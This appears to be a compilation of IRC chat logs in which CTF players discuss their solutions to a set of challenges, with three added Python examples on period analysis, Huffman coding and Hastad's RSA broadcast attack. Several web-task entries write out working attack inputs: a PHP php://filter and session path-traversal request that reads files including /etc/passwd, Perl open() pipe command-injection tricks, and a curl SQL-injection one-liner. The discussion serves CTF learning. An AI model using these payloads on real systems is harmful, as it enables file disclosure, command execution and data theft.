net100 — PCAP
<rik_> did net100 require any bruteforcing?
<Ymgve> rik_: yes it required bruteforcing but it can be done locally
<rik_> OHH
<rik_> oh blehh
<rik_> i refused to brute it
<rik_> kept thinking i was missing something
<hopeless> net 100
ppc400 — Broken Marquee
<Ymgve> phiber_: periods
<phiber_> what do you mean periods
<Ymgve> phiber_: looking at one pixel in a marquee, the sequence it will flash in repeats as long as the display shows the same text
<vos> phiber_: if you look at flashing repeat period of every pixel, you'll get 7 values: 0 is like totally random, 1 is an ever-on/off pixel, 45 is this fake one, 223 is this fake one, 330 is the flag :)
<vos> (also 116, 140, 195 are just random repeating noise)
<phiber_> damn
<phiber_> I found the 45 interval
<kushou> Ymgve: hmm, didn't use that method for ppc400, given the "hello world 123", I made assumptions on the font, then tried to match columns of blanks (spaces between letters), got the bottom 3 lines, then found the 2 by hand
<kushou> (assuming line 1 and 8 are all blanks)
<phiber_> DAMN
<vos> phiber_: damn
<phiber_> I totally overlooked the 330 interval
<phiber_> thought it was a zero
<phiber_> fuck
<phiber_> the damn ppc400
<spq_> what was the intended way for solving broken marquee
<spq_> ?
<Ymgve> spq_: finding periods was probably the intended way
<Ymgve> also parsing the image was a big part of the task
<spq_> had that done but no luck with my analyzing stuff after that
<Ymgve> but then vos decided we were all a bunch of jerks for not attempting it so he gave us the data
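Added example, not part of the chat: the per-pixel period analysis Ymgve and vos describe, run on a small constructed marquee (layout, patterns and periods here are made up; the real task used periods such as 45, 223 and 330). Pixels whose on/off sequence never repeats get period 0, and selecting one period yields the hidden text.

```python
import random

# Constructed per-pixel behaviours: value at frame t is pat[t % len(pat)],
# so the minimal repeat period of such a pixel equals len(pat).
PATTERNS = {
    'F': [1, 1, 0, 1, 0],   # "flag" pixels: period 5
    'D': [1, 0, 0],         # decoy pixels: period 3
    'B': [1, 0],            # plain blinking pixels: period 2
}
LAYOUT = [                  # constructed display; 'N' pixels are random noise
    "FFFNB",
    "FNDNB",
    "FFFDB",
]

def make_frames(layout, n_frames, seed=7):
    """Render n_frames of the constructed display as 2-D 0/1 grids."""
    rng = random.Random(seed)
    frames = []
    for t in range(n_frames):
        frame = []
        for row in layout:
            frame.append([rng.randint(0, 1) if ch == 'N'
                          else PATTERNS[ch][t % len(PATTERNS[ch])] for ch in row])
        frames.append(frame)
    return frames

def repeat_period(seq):
    """Smallest p with seq[i] == seq[i+p] for every i, requiring at least two
    full cycles; 0 if nothing fits (random pixels end up here)."""
    n = len(seq)
    for p in range(1, n // 2 + 1):
        if all(seq[i] == seq[i + p] for i in range(n - p)):
            return p
    return 0

def pixel_periods(frames):
    """Period of every pixel's on/off sequence across all frames."""
    h, w = len(frames[0]), len(frames[0][0])
    return [[repeat_period([f[y][x] for f in frames]) for x in range(w)]
            for y in range(h)]

def mask_by_period(frames, period):
    """Keep only the pixels whose period matches: the text hidden in the marquee."""
    return [[1 if p == period else 0 for p in row] for row in pixel_periods(frames)]
```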
net400 — GSMd
<aXs> lol
<vos> my two major fuckups: 1) connecting to port 0 actually worked for HTTPZ; 2) uptime of GSMd could be found from /etc/adjtime
<vos> intended way for GSMd was to use TCP timestamp to estimate uptime
<Ymgve> lol the adjtime wasn't supposed to be there?
<aXs> vos: adjtime is quite off compared to the tcp timestamps
<vos> aXs: but still is a pretty good estimate
<vos> :D
<vos> Ymgve: hellman solved it that way :)
<vos> he farmed for different hashes for like an hour
<spq_> vos, was there a way to get the uptime without bf?
<vos> spq_: intended way - TCP timestamp field estimation
<Ymgve> spq_: apparently adjtime got roughly the last reboot time and you could get tcp timestamp information
<vos> spq_: shortcut way: look at /etc/adjtime
<Ymgve> stupid way: look at the number of packets sent over lo0
<phiber_> spq_, nmap worked for me, the uptime was accurate with a ~5 minute error
<phiber_> it reported ~73 days uptime
<phiber_> which was like 15~ min close to the timestamp in /etc/adjtime
web400 — PHPwning
<Xelenonz> for web400
<cyberguru> Web400 author's exploit - getting RCE
<Ymgve> haha lol wtf web400 was supposed to be solved like that?
<Ymgve> I used GlobIterator to browse the file system
<aXs> Ymgve: GET /index.php?action=SplFileObject&param=php%3a//filter/read%3dconvert.base64-encode/resource%3dhttp%3a//localhost/admin.php%3fPHPSESSID%3d../var/www/images/fed2d697dfe09bc58dd785eed9027b06 HTTP/1.1
<cyberguru> Ymgve: you were lucky, that flag file was first in / directory and you could easily get it using glob:///*
<cyberguru> Ymgve: we need to hide flags deeper :D
<Ymgve> I wonder if it is possible in web400 to exploit the fact that you can spawn a SoapServer with a service description under your control, somehow
<phiber_> I spent hours with soapserver and simplexmlelement
<phiber_> trying to do xxe
<tomcr00se> omg why did the PHPSESSID in the get work?
<tomcr00se> for web400, i was convinced PHP removed that
<cyberguru> tomcr00se: it is custom session handler in "Session" class
<tomcr00se> yea but that doesn't include the id
<tomcr00se> use_only_cookies is 1 by default in PHP > 5.3.0
<spq_> cyberguru: btw. was this intended: &param=/*
<cyberguru> spq_: nope :)
<spq_> just went through the list of classes existing on my local php installation and found that one which looked good :)
<tomcr00se> you got lucky that it printed the flag first
<spq_> otherwise i would have enumerated the dir
<tomcr00se> how?
<spq_> /A* /B* ...
<tomcr00se> i used DirectoryIterator
<tomcr00se> i still don't understand why PHPSESSID works as a get param
<cyberguru> tomcr00se: but you could read php.ini
<tomcr00se> oh neat, php://filter/read=convert.base64-encode/resource= probably works
<tomcr00se> lol &param=php://filter/read=convert.base64-encode/resource=/etc/passwd
net300 — HTTPZ
<Ymgve> btw, httpz - why does curl on linux fail with some tls error?
<Ymgve> curl on windows (thru a tunnel) works
<vos> Ymgve: httpz - apache seems not to handle port 0 correctly inside Host header
<vos> intended way for HTTPZ was to patch the stack or write a rewrite rule for iptables :<
<Ymgve> lol
<vos> i thought connect to port 0 won't work :D
<vos> like binding 0 does binding to random
<Ymgve> I did curl on windows -> python tunnel script (since netcat didn't work on port 0 by default) and it magically worked
<aXs> patched netcat then openssl s_client to uses port 0, works fine
<Xelenonz> how did you solve HTTPZ? :D
<Ymgve> Xelenonz: curl from windows through a tcp tunnel into a linux system (that supports port 0)
<phiber_> I used this for httpz
ppc100 — Trash
<hopeless> so what was the deal with ppc 100
<Ymgve> ppc100 was badly designed
<cyberguru> Ymgve: python "qrcode" module works fine in ppc100
<hopeless> sys.setdefaultencoding("iso-8859-1")
<hopeless> that's needed in pyqrcode
<Ymgve> if anyone else doesn't want to combat their QR tools, here is the proper zip file stitched together!oYsUzbaY!PfE1pxCOEj6lT6CHiLc20wCwpFsdKL5E53g0LO7kV9w
<mathiasbynens> and to recursively extract that zip: while [ -e *.zip ]; do files=*.zip; for file in $files; do echo "$file"; unzip -q "$file"; rm "$file"; done; done
rev300 — Enchanter
<rik_> how did you guys solve enchanted?
<Ymgve> rik_: it's huffman compression
<rik_> Ymgve, how did you even
<phiber_> after a few hours of tracing and writing pseudocode I recognized it was huffman
<Ymgve> which was much easier than I thought at first, because after a not-too-deep look into the code, I thought it was arithmetic encoding
<Ymgve> and fuck that noise
<rik_> i realized that details was storing the distinct bytes and strength was storing their counts
<rik_> but after that i just gave up
<rik_> because there was too much code O_O
<vos> rik_: personally, i didn't reverse the whole thing. just spotted the frequency table and bit-trash on the output. patched the binary to read freq-table from STDIN and gave it the one from task file. fed it 8x \x00, 8x \x01 and so on and looked what bitstreams it spit out. then when i had all the bit-codes, decoded the original file with a script.
<vos> rik_: my rev300 solution dump
<spq_> btw. enchanter - that one was fun
<spq_> found the freq. table really fast, after some digging, just produced a file with equal char count and looked at the result
<spq_> one could see the patterns very well, scanned that result and produced a pattern -> char list and used it to decompress the original item.enchanted
<Ymgve> I had quite a few problems because the enchanter and I disagreed on which order equal-weighted nodes should be sorted in
<Ymgve> - disenchanter that builds the table itself
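Added example, not from the chat: a Huffman table builder plus encoder/decoder that makes the equal-weight ordering Ymgve ran into explicit. The `tie` switch is my own construction; both orderings give valid optimal codes, but a decoder that rebuilds the tree with the other rule decodes the same bitstream to garbage.

```python
import heapq
from collections import Counter

def huffman_codes(freq, tie='oldest'):
    """Prefix codes from a {byte: count} table via the classic two-smallest merge.
    Equal-weight nodes are ordered by creation sequence: tie='oldest' merges the
    earliest-created first, tie='newest' the latest. Both trees are optimal,
    yet they assign different codewords."""
    sign = 1 if tie == 'oldest' else -1
    heap, seq = [], 0
    for sym, w in sorted(freq.items()):
        heapq.heappush(heap, (w, sign * seq, sym)); seq += 1
    while len(heap) > 1:
        w1, _, left = heapq.heappop(heap)      # first popped becomes the 0 branch
        w2, _, right = heapq.heappop(heap)     # second popped becomes the 1 branch
        heapq.heappush(heap, (w1 + w2, sign * seq, (left, right))); seq += 1
    codes = {}
    def walk(node, prefix):
        if isinstance(node, tuple):
            walk(node[0], prefix + '0'); walk(node[1], prefix + '1')
        else:
            codes[node] = prefix or '0'        # single-symbol input still gets a code
    walk(heap[0][2], '')
    return codes

def encode(data, codes):
    return ''.join(codes[b] for b in data)

def decode(bits, codes):
    """Walk the bit string with the inverse map; leftover bits mean the table did not match."""
    rev = {v: k for k, v in codes.items()}
    out, cur = [], ''
    for bit in bits:
        cur += bit
        if cur in rev:
            out.append(rev[cur]); cur = ''
    if cur:
        raise ValueError('trailing bits do not form a codeword')
    return bytes(out)

def codes_for(data, tie):
    """The table a compressor would store next to the output: symbol counts."""
    return huffman_codes(Counter(data), tie)

def roundtrip(data, tie):
    codes = codes_for(data, tie)
    return decode(encode(data, codes), codes)
```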
ppc300 — Captcha Breaker
<__M__> Was ppc300 supposed to be OCR'd? I noticed there was some public temp directory containing intermediate LaTeX files, one could maybe try to race for those...
<phiber_> uh, I solved it using the latex files
<hopeless> most i talked to used ocr
<hopeless> tesseract to be exact
<pdah> I spent few hours to train tesseract
<__M__> Me too.
<pdah> and same amount of time to wait for the flag
<__M__> Used OCR, but without any training.
<pdah> network was so laggy on that day
<__M__> Tesseract + limited charset + some preprocessing.
<__M__> convert cap.png -background white +repage -bordercolor white -border 50x50 +repage -flatten -fill black -draw "rectangle 30,75 93,168" -flatten -sharpen 1 +matte out.tiff && tesseract out.tiff out config batch.nochop
<cyberguru> __M__: you can write your own captcha solver, because character images are equal every time
<phiber_> ppc300 latex mode
<__M__> hopeless: <- perl/tesseract ppc300
<pdah> I think this is what hopeless asked for:
rev400 — Classic
<phiber_> I solved rev400 with pin and instruction counting
<Ymgve> rev400 was just a simple VM, btw
<Ymgve> also not sure if it was intended but I never could get ida to show the stack when connecting to gdbserver on that task
<phiber_> I used instruction counting to solve it
<phiber_> I didn't even debug it
<Ymgve> phiber_: how what
<phiber_> like this
<Ymgve> oh haha
<Ymgve> side channel attack
<phiber_> yeah
<phiber_> easy and fast
net200 — Jailbreaker
<Xelenonz> So, what the solution for Jailbreak?
<vos> Xelenonz: expected was to download an OTA update package. it's not encrypted
<vos> i wonder how those two heros did it
<vos> did anyone actually jailbreak his atv3g :)
<spq_> ok, last one i didn't solve: jailbreaker - dafuq? i dont have an apple tv :/
<vos> spq_: apple handles their firmware with extreme care, all encrypted and shit
<vos> but it doesn't encrypt the Over-the-Air updates. they are available for download freely
<Ymgve> was that sarcasm
<spq_> so what was the task?
<vos> spq_: just grab an OTA update package from say and send me any file
<spq_> downloading a file from somewhere and sending to you via mail?
<spq_> oh ^^
<vos> net200: task is to learn about OTA updates :)
<spq_> i thought i have to provide some kind of code also
<tomcr00se> (also if i had a damn appletv here in berkeley i have a jailbreak that'll work, i had my dad plug it into my linux box at home but i was too lazy to port the jailbreak to linux)
ppc200 — Play with me
<hopeless> surprised more people didnt get play with me
<hopeless> here is my code
<Ymgve> well I spent hours wondering why the rules were so obtuse
<Ymgve> then realized that the submit format had the coordinates flipped
<Ymgve> x refers to row not column
web200 — Snake
<LongCatTH> how about snake?
<LongCatTH> I found LFI, but not a flag :/
<Ymgve> the LFI can also be used to run commands
<spq_> flag was in /
<LongCatTH> ahh
<spq_> evil perl :)
<Ymgve> you just have to find a clever way to bypass the "does this file exist" check
<spq_> used `$HTTP_USER_AGENT`| as file :)
<spq_> somehow i was unable to use stuff like | < and > - but i could use dd - so i made a mini shell with pieces from the other .pl files :)
<Ymgve> you could also do something like ../../../../../../bin/ls\0|
<Ymgve> but that didn't really help without the ability to specify parameters
<spq_> mainly perls open() with | at the end
<LongCatTH> still didn't get snake!
<LongCatTH> should I write a file?
<LongCatTH> space seems not allowed :x
<spq_> LongCatTH: the file must exist, so e.g. "ls /" does not exist in /usr/bin - so you have to find a way around that, e.g. you create a file with the score upload thingy, that makes it think the file exists but when open'ing, it instead executes part of it (this goes through the shell so backticks are a good example)
<LongCatTH> thx, that's clever 0.0
cry400 — CRYPTONET
<ircc> any writeup for crypto400? what was the idea?
<rik_> hamstad broadcast attack?
<rik_> hastad*
<spq_> crt
<rik_> yeah essentially ^
<spq_> :)
<spq_> + 17th root
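Added example, not from the chat: the CRT-plus-17th-root recovery rik_ and spq_ are describing (Hastad's broadcast attack) on constructed toy moduli. It is the textbook reason unpadded RSA with a small public exponent must never send the same message to e recipients, and why randomized padding is mandatory.

```python
from functools import reduce

def is_prime(n):
    """Trial division; fine for the small constructed primes used here."""
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True

def toy_moduli(count, start=100_003):
    """Constructed toy moduli: products of consecutive distinct primes (far too small for real RSA)."""
    ps, n = [], start
    while len(ps) < 2 * count:
        if is_prime(n):
            ps.append(n)
        n += 1
    return [ps[2 * i] * ps[2 * i + 1] for i in range(count)]

def crt(residues, moduli):
    """Combine x = r_i (mod n_i) over pairwise-coprime n_i into x mod N, N = prod(n_i)."""
    N = reduce(lambda a, b: a * b, moduli)
    x = 0
    for r, n in zip(residues, moduli):
        Ni = N // n
        x += r * Ni * pow(Ni, -1, n)        # modular inverse needs Python 3.8+
    return x % N, N

def iroot(x, k):
    """Exact integer k-th root by binary search, or None if x is not a perfect k-th power."""
    lo, hi = 0, 1
    while hi ** k <= x:
        hi <<= 1
    while lo < hi:
        mid = (lo + hi) // 2
        if mid ** k < x:
            lo = mid + 1
        else:
            hi = mid
    return lo if lo ** k == x else None

def hastad_recover(cts, mods, e):
    """With e ciphertexts of the same unpadded m under e coprime moduli, CRT yields
    m^e as an integer (no wrap, since m^e < N), so a plain integer root returns m."""
    x, _ = crt(cts, mods)
    return iroot(x, e)
```

With fewer than e recipients the combined value wraps modulo N and is not a perfect power, so `hastad_recover` returns None.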
web100 — Voting
<LongCatTH> web100 curl -vvv "" -d "vote=1&submit=&id=0x`echo -n '2 and 1=2 union select flag from task.Flag'|xxd -p|tr -d '\n'`"
cry200 — Hashme
<Xelenonz> crypt200 : just has only my trash file
<hopeless> crypto 200
cry300 — Matrix
<phiber_> did anyone do crypto300 in python?
<phiber_> I tried but I wasn't getting the right matrix divisions, so in the end I used octave
<rik_> phiber_,
<phiber_> I was using M.inv instead of linalg.inv(), and A*B instead of
<phiber_> maybe it was because of that
<rik_> ah
<rik_> A*B isn't proper matrix multiplication
<spq_> phiber_: (python crypto300 solution)